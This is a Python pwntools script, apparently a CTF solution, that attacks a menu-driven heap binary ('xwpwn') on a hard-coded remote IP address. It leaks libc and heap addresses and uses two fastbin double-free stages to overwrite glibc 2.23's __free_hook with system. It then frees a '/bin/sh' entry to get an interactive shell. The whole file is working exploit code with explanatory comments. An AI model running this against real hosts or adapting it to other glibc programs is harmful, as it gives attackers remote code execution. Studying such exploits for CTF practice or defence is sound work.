from pwn import *

# Echo every send/recv while developing the heap exploit; the same setting
# as `context.log_level = 'debug'`, written through pwntools' update call.
context(log_level='debug')

# Remote challenge endpoint and the local copy of the target binary.
# NOTE(review): host/port and binary path are hard-coded; nothing else in the
# visible script reads `elf`.
p = remote('101.200.161.151', 15201)
elf = ELF('./xwpwn')
def add(size, content=''):
    """Menu option 1: allocate a new entry on the remote service.

    ``size`` is sent as text after the "Your choice:" prompt.  The visible
    callers only ever pass 0, 1 or 9, so it is presumably a size-class
    selector rather than a byte count -- verify against the binary.
    ``content`` goes out with ``send`` (no trailing newline) after the
    "lives in:" prompt; callers that want a newline must include one.
    Uses the module-level tube ``p``.
    """
    p.sendlineafter('choice:', '1')
    p.sendlineafter("Your choice:", str(size))
    p.sendafter("lives in:", content)
def free(index):
    """Menu option 2: release the entry at ``index``.

    Only the index is sent; whether the service clears the slot afterwards
    (i.e. whether a dangling pointer survives) is not visible here -- the
    double-free sequences at the call sites suggest it does not.
    Uses the module-level tube ``p``.
    """
    p.sendlineafter('choice:', '2')
    p.sendlineafter('Index of country:', str(index))
def change(index, content):
    """Menu option 3: overwrite the content of the entry at ``index``.

    ``content`` is written with ``send`` (no trailing newline) after the
    "break out in?" prompt.  Uses the module-level tube ``p``.
    """
    p.sendlineafter('choice:', '3')
    p.sendlineafter('Index of country:', str(index))
    p.sendafter('break out in?', content)
def show(index):
    """Menu option 4: print the entry at ``index``.

    Consumes the response up to and including the "Current status:\\n"
    line and returns nothing; the raw bytes that follow are left in the
    tube for the caller to read (the leak code reads them with p.recv(8)).
    Uses the module-level tube ``p``.
    """
    p.sendlineafter('choice:', '4')
    p.sendlineafter('Index of country:', str(index))
    p.recvuntil('Current status:\n')
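# --- glibc offsets -----------------------------------------------------------
# NOTE(review): these are hard-coded for one specific libc build (the values
# are the ones commonly quoted for the Ubuntu 16.04 glibc 2.23 package) and are
# not derived from any binary this script loads.  Confirm them against the libc
# shipped with the challenge, e.g. ELF('libc.so.6').symbols['__free_hook'] and
# .symbols['system'], before trusting the leak arithmetic below.
MAIN_ARENA_LEAK_OFF = 0x68 + 0x3c4b10   # leaked unsorted-bin pointer -> libc base
FREE_HOOK_OFF = 0x3c67a8                # __free_hook
SYSTEM_OFF = 0x45390                    # system

# --- heap grooming -----------------------------------------------------------
add(1, 'aa')
add(0, 'aa')
add(1, 'aa')
add(0, 'aa')
add(9, '\n')
free(0)
free(2)

# --- leak --------------------------------------------------------------------
# A single-byte write, then show() on index 5 dumps raw bytes that we read back
# as an unsorted-bin pointer (libc) followed by a heap pointer.  The index and
# the byte 0x78 depend on the challenge's heap layout -- presumably a partial
# pointer overwrite; verify with the binary.
add(1, '\x78')
show(5)
unsorted = u64(p.recv(8))
print(hex(unsorted))
libc = unsorted - MAIN_ARENA_LEAK_OFF
heap_addr = u64(p.recv(8))
print(hex(heap_addr))
print(hex(libc))
# Sanity check the leak: a libc base is page-aligned, so a misaligned value
# means the leak or MAIN_ARENA_LEAK_OFF is wrong.  Stop here instead of
# corrupting the heap with garbage addresses.
if libc & 0xfff:
    log.error('libc base %#x is not page-aligned; leak/offset mismatch' % libc)

# --- fastbin double free, stage 1 -------------------------------------------
# free(1), free(3), free(1): the A-B-A order defeats glibc's fasttop check,
# which only compares the chunk being freed with the current bin head.
free(1)
free(3)
free(1)
# Target address relative to the leaked heap pointer; the constants encode the
# challenge's heap layout (NOTE(review): not derivable from this script).
victim = heap_addr - 0x12a0 + 0x80 + 0x20
add(9, p64(victim))   # reuse of the dup'd chunk: its fd now points at victim
add(9, '\n')
add(9, '\n')
add(9, p64(0x21))     # allocation served from victim; 0x21 is presumably a fake
                      # chunk size (0x20 | PREV_INUSE) for stage 2 -- verify

# --- fastbin double free, stage 2 -------------------------------------------
free(4)
free(7)
free(4)
add(0, p64(victim + 0x8))   # fd -> victim+8, the fake chunk set up above (presumably)
add(0, '/bin/sh\x00')
add(0, '\n')
print(hex(victim))
free_hook = libc + FREE_HOOK_OFF
add(9, p64(free_hook))      # plant __free_hook's address where entry 5's edit
                            # pointer is read from (inferred from change(5) below)
system = libc + SYSTEM_OFF
change(5, p64(system))      # __free_hook = system
free(11)                    # index 11 is the '/bin/sh' entry if indices are
                            # assigned monotonically -> system("/bin/sh")
p.interactive()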